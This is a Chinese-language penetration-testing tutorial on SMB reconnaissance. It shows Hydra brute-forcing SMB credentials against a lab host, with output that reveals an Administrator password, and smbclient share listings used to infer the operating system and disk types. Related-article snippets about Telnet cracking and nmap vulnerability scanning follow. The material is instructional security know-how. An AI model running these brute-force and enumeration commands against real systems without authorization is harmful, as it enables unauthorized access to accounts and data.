网络扫描:利用SMB服务

VSole2021-08-07 08:39:45

服务器信息块(Server Message Block,SMB)是一种IBM协议,用于在计算机间共享文件、打印机和串口等。SMB协议可以用在TCP/IP协议之上,也可以用在其他网络协议(如NetBEUI)之上。本文介绍利用SMB服务提供的共享文件夹信息,来判断目标主机的操作系统类型和磁盘信息等。

SMB是一种客户机/服务器、请求/响应协议。通过SMB协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。此外,通过SMB协议,应用程序可以访问远程服务端的文件,以及打印机、邮件槽和命名管道等资源。

1. 暴力破解SMB服务

如果要利用SMB服务来获取信息的话,则需要知道该服务的登录用户名和密码。如果使用Samba构建SMB服务的话,默认安装后,将创建一个名为root的Samba用户,密码为空;如果使用Windows自带的SMB服务的话,则需要提供对应的用户名和密码。下面介绍使用Hydra工具暴力破解SMB服务的方法。

Hydra是一款非常强大的开源密码攻击工具,支持多种协议的破解,如FTP、HTTP、SMB等。其中,用于暴力破解SMB服务的语法格式如下:

Hydra -L -P [server IP] smb

使用Hydra工具暴力破解Windows自带的SMB服务。执行命令如下:

root@daxueba:~# hydra -L user.txt -P pass.txt 192.168.19.131 smb

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2021-08-06 10:12:41

[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)

[DATA] max 1 task per 1 server, overall 1 task, 156 login tries (l:13/p:12),~156 tries per task

[DATA] attacking smb://192.168.19.131:445/

[445][smb] host: 192.168.19.131  login: test

[445][smb] host: 192.168.19.131  login: Administrator  password: daxueba

1 of 1 target successfully completed, 2 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2021-08-06 10:12:43

从输出的信息中可以看到,通过使用Hydra工具找到了一个有效的用户名和密码,用户名为Administrator,密码为daxueba。一般情况下,Windows系统都会允许Administrator用户访问所有资源。所以可以使用-l(小写)选项直接指定暴力破解该用户的密码。

root@daxueba:~# hydra -l Administrator -P pass.txt 192.168.19.131 smb

2. 判断操作系统类型

在Linux系统中,提供了一款名为smbclient的客户端工具,可以用来访问SMB服务中的共享文件。当成功访问到SMB共享文件后,即可看到共享文件名、磁盘类型及描述信息。通过对这些信息进行分析,则可以判断出目标主机的操作系统类型及磁盘类型。smbclient工具的语法格式如下:

smbclient -L -U [username]

访问Linux系统中的SMB服务。执行命令如下:

root@daxueba:~# smbclient -L 192.168.19.130 -U root

Enter WORKGROUP\root's password:

输入SMB服务用户登录的密码将显示如下信息:

Sharename    Type   Comment

---------    ----     -------

print$   Disk   Printer Drivers

share    Disk   Share folder

IPC$   IPC    IPC Service (Samba 4.9.2-Debian)

Reconnecting with SMB1 for workgroup listing.

Server     Comment

---------    -------

Workgroup    Master

---------     -------

从以上输出信息中可以看到目标SMB中共享的文件。其中,Sharename表示共享文件名、Type表示硬盘类型、Comment是共享文件的描述。从以上的Comment列可以看到共享的IPC服务版本为Samba 4.9.2-Debian。由此可以说明,该目标主机的操作系统类型为Linux。如果目标主机的操作系统是Windows的话,则文件名列将显示共享文件夹的盘符。具体如下:

root@daxueba:~# smbclient -L 192.168.19.131 -U Test

Enter WORKGROUP\Test's password:

Sharename    Type   Comment

---------      ----    -------

ADMIN$       Disk   远程管理

C$         Disk   默认共享

E$         Disk   默认共享

IPC$        IPC    远程 IPC

share       Disk

Users       Disk

Reconnecting with SMB1 for workgroup listing.

Server        Comment

---------         -------

Workgroup      Master

---------         -------

从以上输出结果的文件名中可以看到,默认共享的磁盘有C和E盘。只有在Windows系统中,文件夹才是以盘符形式来划分磁盘的。由此可以判断出,该目标主机的操作系统类型为Windows。

3. 判断磁盘类型

下面同样通过分析目标SMB服务的共享文件夹信息,来判断共享的磁盘类型。具体如下:

root@daxueba:~# smbclient -L 192.168.19.130 -U root

Enter WORKGROUP\root's password:

Sharename    Type   Comment

---------      ----     -------

print$       Disk   Printer Drivers

share       Disk   Share folder

IPC$        IPC    IPC Service (Samba 4.9.2-Debian)

Reconnecting with SMB1 for workgroup listing.

Server        Comment

---------         -------

Workgroup      Master

---------         -------

从以上输出的信息中可以看到,Type列有两种值,分别是Disk和IPC。其中,Disk表示硬盘;IPC表示命名管道。由此可以说明,share共享文件是硬盘中的一个文件。

smbhydra
本作品采用《CC 协议》,转载必须注明作者和本文链接
hydra是著名组织thc的一款开源的暴力破解密码工具、功能非常强大kali下是默认安装的、几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大以及电脑的性能。Windows中Hydra安装:Hydra官方不支持Windows版,需要在GitHub上下载,地址为:https://github.com/maaaaz/thc-hydra-windows下载之后解压缩即可。-o file 指定结果输出文件-f 找到第一对登录名或者密码的时候中止破解。
服务器信息块(Server Message Block,SMB
在最新的MITER ATT&CK评估中可以找到另一个示例,其中Microsoft Threat Protection将80个不同的警报自动关联为两个事件,这些事件反映了两个攻击模拟。事件视图有助于使防御者快速了解并响应实际攻击的端到端范围。攻击者暴力入侵系统,在不到一个小时的时间内部署勒索软件、盗窃凭证或进行其他恶意活动,时间短减少了受害者进行干预的机会。
破解Telnet的四种方法
2023-02-06 14:18:42
它可以对 50 多种协议执行快速字典攻击,包括 telnet、ftp、http、https、smb、多个数据库等等现在,我们需要选择一个单词列表。与任何字典攻击一样,词表是关键。Kali 内置了许多单词表。-L:表示用户名列表的路径-P:表示密码列表的路径如图所见,我们已成功获取 Telnet用户名xander和密码123。从下图可以看出,我们已经成功获取了 telnet 密码和用户名,此外,Metasploit 还提供了一个额外的好处,即提供远程系统命令 shell以未经授权访问受害者的系统。
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target. nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target. NetCat,它的实际可运行的名字叫nc,应该早很就被提供,就象另一个没有公开但是标准的Unix工具。
Kscan是一款纯go开发的全方位扫描器,具备端口扫描、协议检测、指纹识别等功能。
十种漏洞分析总结
轻量级资产测绘工具 by:kv2. Kscan是一款纯go开发的全方位扫描器,具备端口扫描、协议检测、指纹识别,暴力破解等功能。支持协议1200+,协议指纹10000+,应用指纹2000+,暴力破解协议10余种。4 开始吧Kscan目前具备3种输入目标的方式-t/--target 可添加--check参数,只对指定的目标端口进行指纹识别,否则将对目标进行端口扫描和指纹识别IP地址:114.114.114.114
VSole
网络安全专家